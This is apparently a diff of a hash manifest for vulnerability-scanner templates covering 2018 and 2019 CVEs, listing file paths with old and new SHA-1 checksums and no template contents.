+http/cves/2018/CVE-2018-10738.yaml:a129143d1e25d813e6a8ed5af3a9512672e42285 http/cves/2018/CVE-2018-10818.yaml:efa3271174cdf4babcac2932f09ca4d5e35b49d2 http/cves/2018/CVE-2018-10822.yaml:7f0a230ae784c9666bb8be847c4b06e77ecf6a28 -http/cves/2018/CVE-2018-10823.yaml:e56ee0f2e55b63e521584879d4b3323de92515af -http/cves/2018/CVE-2018-10942.yaml:94d0ecb193f659447722f98f25a13f0a514e2bb4 -http/cves/2018/CVE-2018-10956.yaml:239655fecf2e6394829d36f8d14c29ca20f80c43 -http/cves/2018/CVE-2018-11227.yaml:6479757ec8c8091338264768aab66c062db6aac6 +http/cves/2018/CVE-2018-10823.yaml:a5d4167b803821e0149da4c0ef358976f59ab9a0 +http/cves/2018/CVE-2018-10942.yaml:58ba5b471d4abde0425163b67eaed37bfe6a57c4 +http/cves/2018/CVE-2018-10956.yaml:1204c261608d7354d999fad8912c779e0de3dfb0 +http/cves/2018/CVE-2018-11227.yaml:53df328cd18067c2bfc7a54db4c082c74c882368 http/cves/2018/CVE-2018-11231.yaml:51626c805600f217d4c3eb66418488e1e9b39398 -http/cves/2018/CVE-2018-11409.yaml:6a4092b60a8e09019a0b5c8d263ad8a26f3631dd -http/cves/2018/CVE-2018-11473.yaml:69638aa8a17e8bf9285d88ec0100bd69c36987a6 -http/cves/2018/CVE-2018-11709.yaml:41665abe4890a3b6a73e6019aa9caa22364280ad -http/cves/2018/CVE-2018-11759.yaml:3a5574ca3617542788df6812fb710bbf37cfc098 -http/cves/2018/CVE-2018-11776.yaml:be84324e3b216b65994af263fe66173838e1f212 -http/cves/2018/CVE-2018-11784.yaml:f978f633c1ace52039333d342a53302e110e183a -http/cves/2018/CVE-2018-12031.yaml:535cbea2cfbdae172d980a0433cb660415257246 +http/cves/2018/CVE-2018-11409.yaml:c6091a66c75ccc17eb0ac5f6522d4e71d60475bb +http/cves/2018/CVE-2018-11473.yaml:d9d4a345254b353f60f767a76a59fa107d608d78 +http/cves/2018/CVE-2018-11709.yaml:2182a3c38d7b41f6b6b36a9722623d47260d55c7 +http/cves/2018/CVE-2018-11759.yaml:1f4f6fcbda8ca7a79b5fa2820e2d88d02cf5af01 +http/cves/2018/CVE-2018-11776.yaml:c278de7c331f4d1eb567a55328406cb13e2ab8fc +http/cves/2018/CVE-2018-11784.yaml:46298721157a5d14a61de9549884cefb5ba79e51 +http/cves/2018/CVE-2018-12031.yaml:4779e625bb9ad13c228b5b2dff9d04338aea3aed http/cves/2018/CVE-2018-12054.yaml:4bd015a55fedc7b0cf898eaf9a3049aad883ac05 http/cves/2018/CVE-2018-1207.yaml:d725ed522674e6fe25fe4a413ecba7fe32a1b864 http/cves/2018/CVE-2018-12095.yaml:7c6d4a16cc5c42673c2f23abb768466b6164d306 -http/cves/2018/CVE-2018-12296.yaml:8624bcc28a481bf2535cc047138dbf99a97059ea -http/cves/2018/CVE-2018-12300.yaml:99e1abfc6ea6de4f0699fab1122ff20851681934 -http/cves/2018/CVE-2018-12613.yaml:7fe270962d84ef0e3b411c4c4b5ba4f1aa1a1a5c -http/cves/2018/CVE-2018-12634.yaml:dd631be288be4040ece786fb77e56f085f4359fd -http/cves/2018/CVE-2018-12675.yaml:2b74ddc9e7457002f67d3a52276d1e18b2611ff7 -http/cves/2018/CVE-2018-1271.yaml:def7079fda8992783a771bb074e292b823f826c8 +http/cves/2018/CVE-2018-12296.yaml:fefd3f45861158f5911f0b1d6f5d2df379036bf5 +http/cves/2018/CVE-2018-12300.yaml:4283bdec4127f673c9c0329179a3a915fc902327 +http/cves/2018/CVE-2018-12613.yaml:b7d57877bb9e0fd8fac55ee38fe0c6c7cc70dc26 +http/cves/2018/CVE-2018-12634.yaml:1cb589cfbe1c1461e84b764f5c4edfa93bb04456 +http/cves/2018/CVE-2018-12675.yaml:1019e2a9376f55ef9d0bdf1cedc261fd161623b6 +http/cves/2018/CVE-2018-1271.yaml:99a76e403443736e179bba2bd58ad87e6e8d556e http/cves/2018/CVE-2018-1273.yaml:51f89909ec1b94e979c85d95d7bdc5797fbf8606 http/cves/2018/CVE-2018-12909.yaml:e3190dfe0c8354393d283dc3bbe60b472953e024 http/cves/2018/CVE-2018-12998.yaml:47f498dbb37559c753c8fac62600c63ff9a9c791 -http/cves/2018/CVE-2018-1335.yaml:603d12a7eb5a2415e5d67e27eb4299722131310e -http/cves/2018/CVE-2018-13379.yaml:f4abeb12dd4cc5a62fbb1a6cea10090e265f2fb2 -http/cves/2018/CVE-2018-13380.yaml:8734feef8b6a70208db1067f8b6cd9a7f3db74dc -http/cves/2018/CVE-2018-13980.yaml:7d2ea83edff58f4023bfc2103a74e1fcecb6540e -http/cves/2018/CVE-2018-14013.yaml:2193441a1af6243edc682037946f8d4ce4ce400c +http/cves/2018/CVE-2018-1335.yaml:fc3469df3a3c51ef4f52a76101fbbc68697c4778 +http/cves/2018/CVE-2018-13379.yaml:b1585abae2672f5cbe06b756af3683663bda0ced +http/cves/2018/CVE-2018-13380.yaml:a724fe8544d6bd1880b43ee9d9e322ab142df429 +http/cves/2018/CVE-2018-13980.yaml:6eb4159b100f832aecbabfb6cef291ef5a910cbf +http/cves/2018/CVE-2018-14013.yaml:18f62843d79c16e941804e7e9c63efd13dbf3148 http/cves/2018/CVE-2018-14064.yaml:cccc793c46719cb2a7e81374f651331c60a7890b -http/cves/2018/CVE-2018-14474.yaml:1a6a7c21e82b7d962e5394b5bfa2582ff74885d0 -http/cves/2018/CVE-2018-14574.yaml:d93505082cac96cda4c20d151d07985e81e550b4 +http/cves/2018/CVE-2018-14474.yaml:14147a463e7df9164542239aab9693365cc552d3 +http/cves/2018/CVE-2018-14574.yaml:08cc9b9112b8242b5ed426aa9a016ffaee8351fa http/cves/2018/CVE-2018-14728.yaml:3005fff6268e3e0079028fc907bcad293f3d69fa -http/cves/2018/CVE-2018-14912.yaml:2e747fd7af4ad0250013a6a968dc2409c9eb5beb -http/cves/2018/CVE-2018-14916.yaml:99366bc99fc0a290c76a8719866cd70af5132ffd -http/cves/2018/CVE-2018-14918.yaml:3337bed476d83b757d2a50868709dfb6d4265730 -http/cves/2018/CVE-2018-14931.yaml:aec3137733c19a46022e5e0158bfe0e57270a3fd +http/cves/2018/CVE-2018-14912.yaml:8637942f6d1cad678d3efcd0fdfbb07cfd5915e7 +http/cves/2018/CVE-2018-14916.yaml:e395335963bef34ab111725bb0d36d5a69f06780 +http/cves/2018/CVE-2018-14918.yaml:e536408e3be762c36ce321b5ee381e7914ba27c0 +http/cves/2018/CVE-2018-14931.yaml:faa048b946e4befdd3f55328fe9a3d1218ffe567 http/cves/2018/CVE-2018-15138.yaml:73e253bb1cb6ea31e6a7e7be8c2486bf196671b2 -http/cves/2018/CVE-2018-15517.yaml:23862903157263d68ee6212e53179f5172736730 -http/cves/2018/CVE-2018-15535.yaml:761f13a32b66cba3c805330fda03b152b374b2e0 -http/cves/2018/CVE-2018-15745.yaml:2893ecc4d1961e2138fe090242ff7e3b54951472 -http/cves/2018/CVE-2018-15917.yaml:83c37ef685d12355a32e18120c9ec156909926f9 -http/cves/2018/CVE-2018-15961.yaml:4def13527ee22108d3eb74d5e1eb9399a0140e42 +http/cves/2018/CVE-2018-15517.yaml:12e36b24ee809c6e164212d693481a55f58b1130 +http/cves/2018/CVE-2018-15535.yaml:bfad4720c9ee69d05e8103533e4f856185d62e66 +http/cves/2018/CVE-2018-15745.yaml:448c292479d27f7426b8d45acb2dc8c24dac1ba8 +http/cves/2018/CVE-2018-15917.yaml:f258bab15a5870a96fc436a01da75ad080807eff +http/cves/2018/CVE-2018-15961.yaml:7002b2506196a153ea386aee2db06f292f5039c1 http/cves/2018/CVE-2018-16059.yaml:992cc116f8f261abd69f4cb5b9934ce00d83e8e0 http/cves/2018/CVE-2018-16133.yaml:c01d3089c2ebbe72dfe0e54eb3e5c8626e19d362 -http/cves/2018/CVE-2018-16139.yaml:e847bfca654dd23d574dbfe531b0a691cdcf56f6 -http/cves/2018/CVE-2018-16159.yaml:5b61de6617d5074efccf89df22d81ae7c7c8105f -http/cves/2018/CVE-2018-16167.yaml:f66679c3b289f3e28320055463f4f716317a2c1d -http/cves/2018/CVE-2018-16283.yaml:8a7a91b6b81b9d73042d3199b76a96d594fab657 -http/cves/2018/CVE-2018-16288.yaml:ef5d6815cfe1919acf321f56af943934b95c1baa +http/cves/2018/CVE-2018-16139.yaml:39168cb9083770d3cbddfa4139e0b4cdf61c5247 +http/cves/2018/CVE-2018-16159.yaml:327d838cb702706b8d0d51ac27e8bfe157585a4d +http/cves/2018/CVE-2018-16167.yaml:176a380e5945ac18fc326e04621f5d433fa876a6 +http/cves/2018/CVE-2018-16283.yaml:cd7733e319cc2abbe92fcc06861eed211c030486 +http/cves/2018/CVE-2018-16288.yaml:28a0c7098ffd27a2ab982d73c4f5b71abd27f539 http/cves/2018/CVE-2018-16299.yaml:b020da11f05eaa7a8b9eb2136b09cf8190b0b59c http/cves/2018/CVE-2018-16341.yaml:74ccee29760fe9aaf2616353755ab249f6f6fcfb http/cves/2018/CVE-2018-16668.yaml:48491a4b2add544918c03545451fc5ee424330f3 http/cves/2018/CVE-2018-16670.yaml:c346dc7a3d1df2c12c8f5f1afb69a09c1d785c9a http/cves/2018/CVE-2018-16671.yaml:906368ef356b2b4c8965f8046fd49dbef0dd821f -http/cves/2018/CVE-2018-16716.yaml:c4e7b7d3daee903a199b68d440c6e41525746037 -http/cves/2018/CVE-2018-16761.yaml:4a6d90b317f11da3befdef5b89e497ce7876426b -http/cves/2018/CVE-2018-16763.yaml:f29c6f637d2868e53c10e7c2522b36b40842b00e -http/cves/2018/CVE-2018-16836.yaml:ceafe25bf42e256f10b38e6151c2c7a764259fa5 -http/cves/2018/CVE-2018-16979.yaml:0ecee03cdd86c219e76cfaeff5740908f61b5b4c -http/cves/2018/CVE-2018-17153.yaml:fed4c12e76a4a9c36932f7ca3effaeec9563db62 -http/cves/2018/CVE-2018-17246.yaml:5ebc30e64db945afbd0db95bf9bf73059e81752a -http/cves/2018/CVE-2018-17254.yaml:61a5b750c1409ce5d1b79c8859212fd4bcac1467 -http/cves/2018/CVE-2018-17422.yaml:2f9d775f67d43eecf8d145ffd01aed37075356bc +http/cves/2018/CVE-2018-16716.yaml:18f0e3db7969f3773f0483a9d82b30dc976e5459 +http/cves/2018/CVE-2018-16761.yaml:f1474b4667b0466f717c893ffefbe0d57cf7f2e9 +http/cves/2018/CVE-2018-16763.yaml:ce08c6c034ceb06230c74368d4845570ae25736f +http/cves/2018/CVE-2018-16836.yaml:61541c4720d4fdd223e9141ae08a48bbc0b2adce +http/cves/2018/CVE-2018-16979.yaml:ac6f5cfd3090ba52cea4db62eb8719cbff2b0558 +http/cves/2018/CVE-2018-17153.yaml:5cdbe44c616d3ea36184bee2460031b569d362a0 +http/cves/2018/CVE-2018-17246.yaml:fe7a3e41ef31e8f761f3df652a564aae3997bbd6 +http/cves/2018/CVE-2018-17254.yaml:63a99c6884bcb88c9d81a6d95136c007f8296cf6 +http/cves/2018/CVE-2018-17422.yaml:879432940fa30bcbd2cb3744cf063234690fbe74 http/cves/2018/CVE-2018-17431.yaml:4f724c2ec11d7e5574b913c8f3d171dc69bf23d6 http/cves/2018/CVE-2018-18069.yaml:fb55c1c8a6544261d3da494f50ffe75d12262d5c -http/cves/2018/CVE-2018-18264.yaml:e49855501e1ea92e2e18f03868942e2be2075e2c -http/cves/2018/CVE-2018-18323.yaml:49ada4a8a0e4a8a1cdc9f8d6fb5a2f3b801c5e14 -http/cves/2018/CVE-2018-18570.yaml:1eeeb647ad50a374103212462630e86944fcc129 -http/cves/2018/CVE-2018-18608.yaml:c9faa9dee45e2512ccbe1891582889f90ab4f752 +http/cves/2018/CVE-2018-18264.yaml:46b468443b1c2d1213ea57b3bc99475259235dfe +http/cves/2018/CVE-2018-18323.yaml:b10bf4b2ae8e13371ebf965fc3483d3d84a40bdd +http/cves/2018/CVE-2018-18570.yaml:b798a41cb7e50801d3a488617513cb1b50c6c790 +http/cves/2018/CVE-2018-18608.yaml:64e72bb9efe88dd889259d024f1c7a9c110de645 http/cves/2018/CVE-2018-18775.yaml:6855fbb7653fb75ebfb58a92e13a94bddd6363e7 -http/cves/2018/CVE-2018-18777.yaml:ba4f0ce809e6bbf9633df218956f1b0cc2842bfa -http/cves/2018/CVE-2018-18778.yaml:137375a1f30ee0567998a4c4a609986093bcefde -http/cves/2018/CVE-2018-18809.yaml:39b8141f44a0ee669fdb7e35058f7c6ff3541fc9 -http/cves/2018/CVE-2018-18925.yaml:21c1e900a4b8a05b95c2f0f557379654ae498afd +http/cves/2018/CVE-2018-18777.yaml:ea3dae45b965ecb5c04b58193b4d02c42b35f99a +http/cves/2018/CVE-2018-18778.yaml:baf90f3ecb18ea7cdeac5c22299da6660e9adcd5 +http/cves/2018/CVE-2018-18809.yaml:5824b2854325d7b2c3099f802316cbf6bbebfaee +http/cves/2018/CVE-2018-18925.yaml:0999c707d20e7674e3316fcb080494b4aa7c2a74 http/cves/2018/CVE-2018-19136.yaml:2cdceec8a347290659292d34e7f91f97f8e8671e -http/cves/2018/CVE-2018-19137.yaml:fd1ff8c639e0ca4f776bbbd0238ca952db2985b1 -http/cves/2018/CVE-2018-19287.yaml:0a56cc461952fb23c4221d0aa334d5464bcf0d36 -http/cves/2018/CVE-2018-19326.yaml:8925ef0ecd6f677aa71bed2457d2f6114a3561dc -http/cves/2018/CVE-2018-19365.yaml:a8399476bc01fdd26608698aae3a117b711b1243 -http/cves/2018/CVE-2018-19386.yaml:2d44c5a61bb7061ad629e54b380561de2a35d38e -http/cves/2018/CVE-2018-19439.yaml:93557a94ecca5127e7adf1697cc5946754c64a21 -http/cves/2018/CVE-2018-19458.yaml:9a1c4ed1055bce227a906e29f4487473d6598c49 -http/cves/2018/CVE-2018-19749.yaml:6cd5dc9be2d13dc800a9ca4f6089838404803360 +http/cves/2018/CVE-2018-19137.yaml:10f56626df0c7fa74817bc38fef21ab7da2bb199 +http/cves/2018/CVE-2018-19287.yaml:740bc06472e431b5cc9bfccf489ab004996c0f3d +http/cves/2018/CVE-2018-19326.yaml:62359b3ae095f6a9b084fa027a12efcc9eba6f69 +http/cves/2018/CVE-2018-19365.yaml:576ff6d8085f14db8b3c1db51e1aa6346c5e4031 +http/cves/2018/CVE-2018-19386.yaml:521152286d482dead5c0d91b75d6246646629049 +http/cves/2018/CVE-2018-19439.yaml:44f03cecf9c0742b6658b1c454bbd93724aa96c4 +http/cves/2018/CVE-2018-19458.yaml:565726e6eeb6e8b7c405013cee2c313b909fa120 +http/cves/2018/CVE-2018-19749.yaml:28104dd3a487cd17227ce25cc9338dff9c08cfde http/cves/2018/CVE-2018-19751.yaml:41a013ed8f511aaea82081e075916ed638b1ebab -http/cves/2018/CVE-2018-19752.yaml:e3d17d1b2dea369da7e33fa13dcf56bb79d148de -http/cves/2018/CVE-2018-19753.yaml:1d0baa4a16b3ec969135a6dc642de67c854ec3a1 +http/cves/2018/CVE-2018-19752.yaml:71e38315bba3bb99c68bb98ae47546e3a8852636 +http/cves/2018/CVE-2018-19753.yaml:20eac71a3629c82df03f7b5d5221e06b8b89b8c2 http/cves/2018/CVE-2018-19877.yaml:31aa058606935cc5babf7d592f92f87aeaf162ec http/cves/2018/CVE-2018-19892.yaml:b0823b9b53093ad710fc09dbdb2e78790f92a200 -http/cves/2018/CVE-2018-19914.yaml:08e33fa9f1fc8a7d48bfc23e9abb3401f0a7eefb -http/cves/2018/CVE-2018-19915.yaml:2c6e0242cea923049907f76a74b85edfab5183eb -http/cves/2018/CVE-2018-20009.yaml:975ad7802a4b86368020631067f9a6ddd0783d48 +http/cves/2018/CVE-2018-19914.yaml:a114f893cf8568e67d37bc14ffe7873fa217c612 +http/cves/2018/CVE-2018-19915.yaml:1611fce07118e7ebc351f355cfdb0433425c89b1 +http/cves/2018/CVE-2018-20009.yaml:ee1015fa79e95b36c728126336f745c57b8234cd http/cves/2018/CVE-2018-20010.yaml:ec78911a377dfae9ce54f561a7d71ba449a741dd http/cves/2018/CVE-2018-20011.yaml:98950dff4dbf42b3759537438082d4166c789270 http/cves/2018/CVE-2018-20462.yaml:70faa7b267536593d4b33427ff677d12deb57cce http/cves/2018/CVE-2018-20463.yaml:9712578b99f890b278c05e83cce8bf9ab31cf93f -http/cves/2018/CVE-2018-20470.yaml:f64b036510d604de04aaf2db6996aa9a248be4b0 -http/cves/2018/CVE-2018-20526.yaml:bdbb51d1ffa66cebc0ae6e78cf40726e8f97a2d9 +http/cves/2018/CVE-2018-20470.yaml:ea3915d1ed278c8a4cbd4f954db50271ba8356f3 +http/cves/2018/CVE-2018-20526.yaml:fbbc6402437df32074a1b2b054e1c0ab9b127a29 http/cves/2018/CVE-2018-20608.yaml:92c17d1974d5042e036f5bfebf8cb2b0fe669c34 -http/cves/2018/CVE-2018-20824.yaml:e9c7b19a982fdbc77a7a6e97718392b2c6fbab01 -http/cves/2018/CVE-2018-20985.yaml:6e840038e5ef9a5d859f4d668036d2121b3fac40 +http/cves/2018/CVE-2018-20824.yaml:6ea5cdd90c960d5ecc05e736199e1a6954baca18 +http/cves/2018/CVE-2018-20985.yaml:4bb634eec7d3375bcddca14b53c76512eba48045 http/cves/2018/CVE-2018-2392.yaml:b0dfd0dc15a700e7739aaea55f5d5aa6fb45b61c -http/cves/2018/CVE-2018-2791.yaml:ec08db845d506ea70eef8190ff46cfbc3ddb4d06 -http/cves/2018/CVE-2018-2894.yaml:f262fb833059893aa4a51846e7312e53cf8844e7 -http/cves/2018/CVE-2018-3167.yaml:273f69df618572a6af4c29fb49751377ba38195f -http/cves/2018/CVE-2018-3238.yaml:5030ec913ae838ffaf3b60ca7be68a434aff3bbe +http/cves/2018/CVE-2018-2791.yaml:31136b756dcfeb64b3f98823a29b78db51519f5b +http/cves/2018/CVE-2018-2894.yaml:118a0c7de50f4a856992bfa9380c946b2f4dd28f +http/cves/2018/CVE-2018-3167.yaml:248b1742e31ca65c14d9ae9a070849d9850b077f +http/cves/2018/CVE-2018-3238.yaml:290f44dd8265304d0a28fe5a8814b51d8a7a3a56 http/cves/2018/CVE-2018-3714.yaml:467fa520a83d33a07e51718f5bcb3c358beea1d4 http/cves/2018/CVE-2018-3760.yaml:90f7093f1e64c13dea1afaee2fe85b1fcef938ff http/cves/2018/CVE-2018-3810.yaml:2d56de0a9b2c76b6aad57d50302dbcf26a90e6b2 -http/cves/2018/CVE-2018-5230.yaml:65c5eec3102fa06c52d29003683038ce945e7a29 -http/cves/2018/CVE-2018-5233.yaml:2810f960e2057833a3a224cc7cf41556f23a6a2b +http/cves/2018/CVE-2018-5230.yaml:9c084e311280bf0b0b4e0ea9b249b7a0b20c67de +http/cves/2018/CVE-2018-5233.yaml:437e02a1ebdd20198ef1456d32007910ae09cf2f http/cves/2018/CVE-2018-5316.yaml:fe0e4112fa6a7f2918925dff5501b19680026501 -http/cves/2018/CVE-2018-5715.yaml:1c44d1785af1d90a1bf56c7d71710399f35ef6c4 -http/cves/2018/CVE-2018-6008.yaml:34f83b3b57e8d26d90647da2d70c4e7b7dd60380 -http/cves/2018/CVE-2018-6184.yaml:fc991ad3b4fc4ef0b2c379ec4795279b8b806f77 -http/cves/2018/CVE-2018-6200.yaml:dfead2b2caa43616b1debefbee4bf46566978351 +http/cves/2018/CVE-2018-5715.yaml:d7a49108189cfcd6c75a6cac00344fe146dff4d8 +http/cves/2018/CVE-2018-6008.yaml:d9b979c4b3813f317c2efe8206d4e8a5b1215e3e +http/cves/2018/CVE-2018-6184.yaml:1ea895f0a16a76f223dd4812f77b50d84bec0703 +http/cves/2018/CVE-2018-6200.yaml:7588192682a4ac8c00d7c6a83621103dd23e0c8d http/cves/2018/CVE-2018-6530.yaml:a7ec85a12911cc378322baaa7a1912ca731ce631 http/cves/2018/CVE-2018-6605.yaml:9395411144d77cf69a9f241d6eac574be3803a3a -http/cves/2018/CVE-2018-6910.yaml:5cdd602b4a3ee04e69fd5bb65014b372ffd67e77 -http/cves/2018/CVE-2018-7251.yaml:3173253cec72ee76a5cb9d69a05f0339ee638caa -http/cves/2018/CVE-2018-7282.yaml:322b1e3e3ceb2f4b4c37b987be40cf148fbe1b61 +http/cves/2018/CVE-2018-6910.yaml:c84b3d5ba116c18bc9f605d5f208a7392d2bc5b4 +http/cves/2018/CVE-2018-7251.yaml:35bdb470f05dec3b89486bd31a38d23be7d85346 +http/cves/2018/CVE-2018-7282.yaml:5f91f643f99ad1bcc155f74d02c0cf692383611a http/cves/2018/CVE-2018-7314.yaml:bd70e733cbf74d122f249c148b42dab8ddacb60f http/cves/2018/CVE-2018-7422.yaml:e3c039258631c4bcd6be9a250683a659c30589e4 -http/cves/2018/CVE-2018-7467.yaml:714eccac0c1d375748ece0da2b87c68d27a461bd +http/cves/2018/CVE-2018-7467.yaml:1b0142f9c76787034d813d1cb3bf1d803ab77c63 http/cves/2018/CVE-2018-7490.yaml:569286ff6beffe744aed0915b8d887e6921ee84b -http/cves/2018/CVE-2018-7600.yaml:3d30ed4f3a3f787ed1a31a95852b86bcabafc09a -http/cves/2018/CVE-2018-7602.yaml:9528f0b81c634579fb58bf3feb93049ed6deac9b -http/cves/2018/CVE-2018-7653.yaml:d52e4702df453fcf5b2a641b564ada02cdc1f32e -http/cves/2018/CVE-2018-7662.yaml:d8f5272bb557b3f06386824fbd5ad3ac6d91f62f -http/cves/2018/CVE-2018-7700.yaml:339dc5c02de55e6e0589ac79da7425a56064185c +http/cves/2018/CVE-2018-7600.yaml:c000552581e79c98057d74f9da4a469bcf5ec93f +http/cves/2018/CVE-2018-7602.yaml:d463f1fde61db5200400511b3ffdb63f0d8c0d64 +http/cves/2018/CVE-2018-7653.yaml:b96ae7482cb6da1010b5f9262dbea86982fdc147 +http/cves/2018/CVE-2018-7662.yaml:f227ce3aa502c6302dbe55932d703c645119b1c6 +http/cves/2018/CVE-2018-7700.yaml:51f8418b0b9929da6e5a02acd58ea51d47a61bf0 http/cves/2018/CVE-2018-7719.yaml:47cab26137d85e8909949d13e765303fb157f35e -http/cves/2018/CVE-2018-8006.yaml:11820c48004a18fd909fa35b6022d85c9203a9b8 -http/cves/2018/CVE-2018-8033.yaml:ed36027558a45eb525720fa1f9b07b85f65d2a05 -http/cves/2018/CVE-2018-8715.yaml:845d59d1e0942c3760c2d843b177157d5b31da54 -http/cves/2018/CVE-2018-8719.yaml:bfb5ceeb330f74172c117e625fe69e8e10197361 +http/cves/2018/CVE-2018-8006.yaml:3b6d44bf0fe24307cfd762aa476b70b45ab9ce11 +http/cves/2018/CVE-2018-8033.yaml:1413436dc458d3d24ef1b6ef0516fb29b82bd0e4 +http/cves/2018/CVE-2018-8715.yaml:d4851d7cc81088c538c4f3b2a73af93400e44e0e +http/cves/2018/CVE-2018-8719.yaml:78364732d8025f076c2a124f70afd3e5bd934968 http/cves/2018/CVE-2018-8727.yaml:fc1c33f0a40fc19bbd5c77e8bc0a71e35d54e56d http/cves/2018/CVE-2018-8770.yaml:697c1ba6a15230f9f9f2ce2899ebefc4fc0ef068 -http/cves/2018/CVE-2018-8823.yaml:841bfa50c0524f4b3dea7995e28c5c314b15ac27 -http/cves/2018/CVE-2018-9118.yaml:7bf016eaceeefb7d38e88c7841928d26f601f581 +http/cves/2018/CVE-2018-8823.yaml:acf4fbf0c8efd75fa11f47e4bce90db39d83af47 +http/cves/2018/CVE-2018-9118.yaml:4c13276c78e4d2e73f19a54a77115b4c4a48aae6 http/cves/2018/CVE-2018-9161.yaml:f98357d745d30e54b9a0f949e05f38ae29148319 -http/cves/2018/CVE-2018-9205.yaml:ddc94395c8fd94dd7f3dfd5d521c88d2a18d1293 +http/cves/2018/CVE-2018-9205.yaml:1499d18423846d499f720c4264a44ad75f27f93f http/cves/2018/CVE-2018-9845.yaml:1d90b0a63da858688c950787f350bc620243c869 http/cves/2018/CVE-2018-9995.yaml:1acb8eb87312ef544059faa23df771316f81e41d -http/cves/2019/CVE-2019-0193.yaml:1315152b6f01340007acd5426780992d9823ce27 -http/cves/2019/CVE-2019-0221.yaml:58497e316e0aa43087705825cf0b213ee8d13d21 -http/cves/2019/CVE-2019-0230.yaml:e303dedee56203e94933d761fc9ffd427f22b090 -http/cves/2019/CVE-2019-10068.yaml:372682e6aa3ccb83aaf474bccba5f4b103796745 -http/cves/2019/CVE-2019-10092.yaml:d9d774da89cff5cf78b56c38b569f2a093dab139 -http/cves/2019/CVE-2019-10098.yaml:5295a08794823dd689b4a8597f5d10f51191197f +http/cves/2019/CVE-2019-0193.yaml:5895cee3d3ed5862b9cd6e0d90007292231a467f +http/cves/2019/CVE-2019-0221.yaml:a60272d48feb8c14024507bad12a828ddb1bdf8e +http/cves/2019/CVE-2019-0230.yaml:5bea44b0e336d65b242265604818831f218831b5 +http/cves/2019/CVE-2019-10068.yaml:490f5b18e6a9df7eea47ff5973a4ef6917eb3e84 +http/cves/2019/CVE-2019-10092.yaml:95036721a0c5900e3a43158830752db468be81ab +http/cves/2019/CVE-2019-10098.yaml:87e95f3b56cfc09f00ff2b41cd42e53aea290fe8 http/cves/2019/CVE-2019-1010287.yaml:cec033f9ac31aaf83bd80c9279ab5a7aed4b890a -http/cves/2019/CVE-2019-1010290.yaml:fd5a6b728a89be5e21149ba9b9ddf9fd0add141d +http/cves/2019/CVE-2019-1010290.yaml:a264cb928c69ab6428e128c0ee33d265634e2fc2 http/cves/2019/CVE-2019-10232.yaml:713f169c89ece5300e52e0bc987370371d9b3573 -http/cves/2019/CVE-2019-10405.yaml:9c26c8436451083f65afdc4c91524a483af73c8e -http/cves/2019/CVE-2019-10475.yaml:4a159a11f75f8e287a519514c93eb55af3a1173b -http/cves/2019/CVE-2019-10692.yaml:b6b4abd2fcde505f79a4b4c2c942ed242d967edd -http/cves/2019/CVE-2019-10717.yaml:087d9a5aa47b927d396fc4b7752b03de3782ebbf -http/cves/2019/CVE-2019-10758.yaml:3a79381a7eeb08f38bd8f5f6c862fc7c1f05c5d6 +http/cves/2019/CVE-2019-10405.yaml:48da2adabbe91b7c6fc6e17540d8905a684e0432 +http/cves/2019/CVE-2019-10475.yaml:95b5f0bc9f584b4e7c2c7b39fa2de8560c35c198 +http/cves/2019/CVE-2019-10692.yaml:e03cfcc646b10b50f803898d7416ba908c049add +http/cves/2019/CVE-2019-10717.yaml:9c839238a9f9cca85816c8eaa99416c353849633 +http/cves/2019/CVE-2019-10758.yaml:5e68af684ce511d788c47f865c3b01ed1abc280c http/cves/2019/CVE-2019-11013.yaml:2ad66e116c4d085161542c51376f4c68df78c478 -http/cves/2019/CVE-2019-11248.yaml:5124a8a18753e96e412cceb36a590249f61fc296 -http/cves/2019/CVE-2019-11370.yaml:df484ba9eda9562fce57052043fe7e6bcc20c892 -http/cves/2019/CVE-2019-11510.yaml:37ce5da29efdabcad9bbe9ed562d39ff4af92988 -http/cves/2019/CVE-2019-11580.yaml:0960dfb042ac587bf860280f1c682f7c95ebc4d8 -http/cves/2019/CVE-2019-11581.yaml:f29ac5a617fd6582e8416d89f0e96fc75fee02fd -http/cves/2019/CVE-2019-11869.yaml:554296f0a9b3b597f433271e96c94945b1a1e2eb -http/cves/2019/CVE-2019-12276.yaml:d46baca1545e6e8549012c7397daf86a7a6b23e4 -http/cves/2019/CVE-2019-12314.yaml:b86487969cfe1c1e84e842d93a500fb71e3964fa -http/cves/2019/CVE-2019-12461.yaml:3068bf62d30fc8534e65663178590794413f5aaa -http/cves/2019/CVE-2019-12581.yaml:6543be0bceac3b6b2e2f725167baeacccc790117 -http/cves/2019/CVE-2019-12583.yaml:ea1f2ee731644d9b9ff35227124b5f9deedc57ff -http/cves/2019/CVE-2019-12593.yaml:73dc1dd1b2adcf7e32f17dfd589b907e7b9856c5 -http/cves/2019/CVE-2019-12616.yaml:cb73607b6fa9ebb0e404e6fd23a996b5f567a2d4 -http/cves/2019/CVE-2019-12725.yaml:ed7b7dd0f24be6fc9e460590f4ed3cab3430b5c1 -http/cves/2019/CVE-2019-12962.yaml:4799a7b0f606ddb24efafe013cff6f4993535b96 -http/cves/2019/CVE-2019-12985.yaml:014126b5bea9dec1b4e8f11d2ae3b711f037b376 -http/cves/2019/CVE-2019-12986.yaml:05937e0d453d00b1c43afd669e3774b7d5bf06a4 -http/cves/2019/CVE-2019-12987.yaml:282eff1208d350bf7bebfa8827f318c133bb66c9 -http/cves/2019/CVE-2019-12988.yaml:197577eac25a532f0584f5822f1c60392d838f05 -http/cves/2019/CVE-2019-12990.yaml:9e48d7926d2162a4aef49feac4d58cd390d04f82 -http/cves/2019/CVE-2019-13101.yaml:a2a632e54cddccaee9effe4844f8a873b728dc35 -http/cves/2019/CVE-2019-13392.yaml:17334f15559dd076fab6f71057a6d17bd81e6479 -http/cves/2019/CVE-2019-13396.yaml:edc16e834ab7130bd4a78f1dce409fe9bb1a2297 -http/cves/2019/CVE-2019-13462.yaml:d5f61f3b4adc7f30143d5cb225f9529d89ba0b69 -http/cves/2019/CVE-2019-14205.yaml:794ebe6439f61bfe64973e2790e46f152ceb55b0 -http/cves/2019/CVE-2019-14223.yaml:bfa751b74191106c210a2899db25813c7ff78181 -http/cves/2019/CVE-2019-14251.yaml:e5edfce134c1c8362fec90ac0650c81dfc2ca49f -http/cves/2019/CVE-2019-14312.yaml:128399e7d4367691df73cd65e3e74aee03220533 -http/cves/2019/CVE-2019-14322.yaml:8a5f7120a05939ac777c37d4265cac8d83a8e347 +http/cves/2019/CVE-2019-11248.yaml:69bf371a2ae74df3a820ec654e531183cd52d586 +http/cves/2019/CVE-2019-11370.yaml:7bb4da17ad5c55a29cab53cae1ff9e90da64e689 